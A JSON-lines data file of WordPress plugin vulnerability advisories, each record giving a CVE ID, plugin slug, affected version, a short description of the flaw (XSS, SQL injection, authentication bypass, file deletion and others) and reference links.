{"CVE_ID":"CVE-2024-7390","slug":"wp-testimonial-widget","versionImpact":"3.0","description":"The WP Testimonial Widget plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fnSaveTestimonailOrder function in all versions up to, and including, 3.0. This makes it possible for unauthenticated attackers to change the order of testimonials.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67eef869-a57f-40b5-b289-9353bf5b680a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67eef869-a57f-40b5-b289-9353bf5b680a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-testimonial-widget\\\/trunk\\\/functions.php#L358\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-testimonial-widget\\\/trunk\\\/functions.php#L358\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8364","slug":"wp-custom-fields-search","versionImpact":"1.2.35","description":"The WP Custom Fields Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpcfs-preset shortcode in all versions up to, and including, 1.2.35 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef36a2a1-b3be-4270-8890-76705817b4b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef36a2a1-b3be-4270-8890-76705817b4b5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-custom-fields-search\\\/trunk\\\/plugin.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-custom-fields-search\\\/trunk\\\/plugin.php#L53\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-custom-fields-search\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-custom-fields-search\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9507","slug":"bit-form","versionImpact":"2.15.2","description":"The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to arbitrary file read in all versions up to, and including, 2.15.2 due to improper input validation within the iconUpload function. This makes it possible for authenticated attackers, with Administrator-level access and above, to leverage a PHP filter chain attack and read the contents of arbitrary files on the server, which can contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa46842f-ed07-4f72-aedb-aa27baecd79c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa46842f-ed07-4f72-aedb-aa27baecd79c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Admin\\\/AdminAjax.php#L1210\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/trunk\\\/includes\\\/Admin\\\/AdminAjax.php#L1210\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-form\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-form\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165686\\\/bit-form\\\/trunk\\\/includes\\\/Admin\\\/AdminAjax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165686\\\/bit-form\\\/trunk\\\/includes\\\/Admin\\\/AdminAjax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165686\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165686\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9988","slug":"crypto","versionImpact":"2.15","description":"The Crypto plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.15. This is due to missing validation on the user being supplied in the 'crypto_connect_ajax_process::register' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bfe87cf-9883-4f8f-a0f5-23bbc7bb9b7c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bfe87cf-9883-4f8f-a0f5-23bbc7bb9b7c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crypto\\\/tags\\\/2.10\\\/includes\\\/class-crypto_connect_ajax_register.php#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crypto\\\/tags\\\/2.10\\\/includes\\\/class-crypto_connect_ajax_register.php#L91\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13447","slug":"wp-hotel-booking","versionImpact":"2.1.6","description":"The WP Hotel Booking plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the hotel_booking_load_order_user AJAX action in all versions up to, and including, 2.1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve a list of registered user emails.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-hotel-booking\\\/trunk\\\/assets\\\/js\\\/admin\\\/admin.hotel-booking.js#L621\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-hotel-booking\\\/trunk\\\/assets\\\/js\\\/admin\\\/admin.hotel-booking.js#L621\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225879\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225879\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-hotel-booking\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-hotel-booking\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc883e7e-af82-47e1-a0c0-122e6abd6b52?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc883e7e-af82-47e1-a0c0-122e6abd6b52?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13114","slug":"wp-projects-portfolio","versionImpact":"3.0","description":"The WP Projects Portfolio with Client Testimonials WordPress plugin through 3.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0cecda12-590a-42a6-b10b-e0efe7fb3a3a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0cecda12-590a-42a6-b10b-e0efe7fb3a3a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5703","slug":"stageshow","versionImpact":"10.0.3","description":"The StageShow plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018anchor\u2019 parameter in all versions up to, and including, 10.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stageshow\\\/trunk\\\/include\\\/stageshowlib_salesplugin.php#L424\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stageshow\\\/trunk\\\/include\\\/stageshowlib_salesplugin.php#L424\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stageshow\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stageshow\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6543b8ad-e3f3-43c7-93f9-23f7df07e391?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6543b8ad-e3f3-43c7-93f9-23f7df07e391?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5391","slug":"wc-purchase-orders","versionImpact":"1.0.2","description":"The WooCommerce Purchase Orders plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the delete_file() function in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-purchase-orders\\\/trunk\\\/includes\\\/class-bbpo-purchase-orders.php#L151\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-purchase-orders\\\/trunk\\\/includes\\\/class-bbpo-purchase-orders.php#L151\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-purchase-orders\\\/trunk\\\/includes\\\/class-bbpo-purchase-orders-files.php#L148\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-purchase-orders\\\/trunk\\\/includes\\\/class-bbpo-purchase-orders-files.php#L148\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05a27a34-b324-4968-937e-2c0d24175d2a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05a27a34-b324-4968-937e-2c0d24175d2a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1844","slug":"subscribe2","versionImpact":"10.40","description":"The Subscribe2 plugin for WordPress is vulnerable to unauthorized access to email functionality due to a missing capability check when sending test emails in versions up to, and including, 10.40. This makes it possible for author-level attackers to send emails with arbitrary content and attachments to site users.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subscribe2\\\/trunk\\\/admin\\\/send-email.php#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subscribe2\\\/trunk\\\/admin\\\/send-email.php#L12\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c34ce601-5cf9-433f-bc9d-5c705eba6b08?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c34ce601-5cf9-433f-bc9d-5c705eba6b08?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2930676\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2930676\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-30876","slug":"daves-wordpress-live-search","versionImpact":"4.8.1","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Dave Ross Dave's WordPress Live Search plugin <=\u00a04.8.1 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/daves-wordpress-live-search\\\/wordpress-dave-s-wordpress-live-search-plugin-4-8-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/daves-wordpress-live-search\\\/wordpress-dave-s-wordpress-live-search-plugin-4-8-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1381","slug":"page-builder-sandwich","versionImpact":"5.1.0","description":"The Page Builder Sandwich \u2013 Front End WordPress Page Builder Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.1.0. This makes it possible for authenticated attackers, with subscriber access and higher, to extract sensitive user or configuration data.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e98d92a-fe64-4591-972b-ed11542506b7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e98d92a-fe64-4591-972b-ed11542506b7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-sandwich\\\/trunk\\\/class-inspector.php#L90\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-sandwich\\\/trunk\\\/class-inspector.php#L90\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6172","slug":"email-subscribers","versionImpact":"5.7.25","description":"The Email Subscribers by Icegram Express \u2013 Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the db parameter in all versions up to, and including, 5.7.25 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13629598-d45d-4ff5-aeb5-6ac881d25183?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13629598-d45d-4ff5-aeb5-6ac881d25183?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/db\\\/class-es-db-contacts.php#L834\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/db\\\/class-es-db-contacts.php#L834\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107964\\\/email-subscribers#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107964\\\/email-subscribers#file4\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-subscribers\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/email-subscribers\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3107964%40email-subscribers%2Ftrunk&old=3104864%40email-subscribers%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3107964%40email-subscribers%2Ftrunk&old=3104864%40email-subscribers%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7134","slug":"wp-poll","versionImpact":"3.3.78","description":"The LiquidPoll \u2013 Polls, Surveys, NPS and Feedback Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018form_data\u2019 parameter in all versions up to, and including, 3.3.78 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e62eba7-1ac9-4420-8692-58a169aa4330?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e62eba7-1ac9-4420-8692-58a169aa4330?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-poll\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-poll\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-poll\\\/trunk\\\/includes\\\/classes\\\/class-hooks.php#L408\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-poll\\\/trunk\\\/includes\\\/classes\\\/class-hooks.php#L408\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4533","slug":"limit-login-attempts-plus","versionImpact":"1.1.0","description":"The Limit Login Attempts Plus plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 1.1.0. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aec7b59f-1c8a-4403-b33b-c119bd96ad9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aec7b59f-1c8a-4403-b33b-c119bd96ad9d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/limit-login-attempts-plus\\\/trunk\\\/core\\\/LimitLoginAttempts.php#L1043\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/limit-login-attempts-plus\\\/trunk\\\/core\\\/LimitLoginAttempts.php#L1043\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-50466","slug":"darkmysite","versionImpact":"1.2.8","description":"Cross-Site Request Forgery (CSRF) vulnerability in DarkMySite DarkMySite \u2013 Advanced Dark Mode Plugin for WordPress darkmysite allows Cross Site Request Forgery.This issue affects DarkMySite \u2013 Advanced Dark Mode Plugin for WordPress: from n\/a through 1.2.8.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/darkmysite\\\/wordpress-darkmysite-advanced-dark-mode-plugin-for-wordpress-plugin-1-2-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/darkmysite\\\/wordpress-darkmysite-advanced-dark-mode-plugin-for-wordpress-plugin-1-2-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2580","slug":"bit-form","versionImpact":"2.18.3","description":"The Contact Form by Bit Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.18.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3271396\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3271396\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-form\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-form\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f3b5d85-a8b0-43ac-b593-a61e20b9a4ca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f3b5d85-a8b0-43ac-b593-a61e20b9a4ca?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5699","slug":"devformatter","versionImpact":"2015.0.2.1","description":"The Developer Formatter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom CSS in all versions up to, and including, 2015.0.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/devformatter\\\/trunk\\\/devfmt_css.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/devformatter\\\/trunk\\\/devfmt_css.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/devformatter\\\/trunk\\\/devinterface.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/devformatter\\\/trunk\\\/devinterface.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/devformatter\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/devformatter\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63192a95-778b-452b-9081-cf20dc7f7ec1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63192a95-778b-452b-9081-cf20dc7f7ec1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6742","slug":"sureforms","versionImpact":"1.7.3","description":"The SureForms \u2013 Drag and Drop Form Builder for WordPress plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.7.3 via the use of file_exists() in the delete_entry_files() function without restriction on the path provided. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3319753%40sureforms&new=3319753%40sureforms&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3319753%40sureforms&new=3319753%40sureforms&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sureforms\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sureforms\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1de12d1c-5ac4-4f80-b33d-a689a6916ee0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1de12d1c-5ac4-4f80-b33d-a689a6916ee0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4390","slug":"wp-private-content-plus","versionImpact":"3.6.2","description":"The WP Private Content Plus plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.6.2 via the 'validate_restrictions' function. This makes it possible for unauthenticated attackers to extract sensitive data including the content of resticted posts on archive and feed pages.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-private-content-plus\\\/trunk\\\/classes\\\/class-wppcp-private-posts-pages.php#L138\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-private-content-plus\\\/trunk\\\/classes\\\/class-wppcp-private-posts-pages.php#L138\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-private-content-plus\\\/trunk\\\/classes\\\/class-wppcp-private-posts-pages.php#L211\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-private-content-plus\\\/trunk\\\/classes\\\/class-wppcp-private-posts-pages.php#L211\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c305546-1548-4b77-a484-d7c51d829792?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c305546-1548-4b77-a484-d7c51d829792?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3427","slug":"salon-booking-system","versionImpact":"8.4.6","description":"The Salon Booking System plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 8.4.6. This is due to missing or incorrect nonce validation on the 'save_customer' function. This makes it possible for unauthenticated attackers to change the admin role to customer or change the user meta to arbitrary values via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2931406%40salon-booking-system&new=2931406%40salon-booking-system&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2931406%40salon-booking-system&new=2931406%40salon-booking-system&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Admin\\\/Customers.php?rev=2779160#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Admin\\\/Customers.php?rev=2779160#L68\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93875f19-d9b9-4e33-bba9-afc75cf26bf2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93875f19-d9b9-4e33-bba9-afc75cf26bf2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3244","slug":"comments-like-dislike","versionImpact":"1.1.9","description":"The Comments Like Dislike plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the restore_settings function called via an AJAX action in versions up to, and including, 1.1.9. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to reset the plugin's settings. NOTE: After attempting to contact the developer with no response, and reporting this to the WordPress plugin's team 30 days ago we are disclosing this issue as it still is not updated.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/comments-like-dislike\\\/trunk\\\/inc\\\/classes\\\/cld-admin.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/comments-like-dislike\\\/trunk\\\/inc\\\/classes\\\/cld-admin.php#L99\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66019297-a8a8-4bbc-99db-4b47066f3e50?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66019297-a8a8-4bbc-99db-4b47066f3e50?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
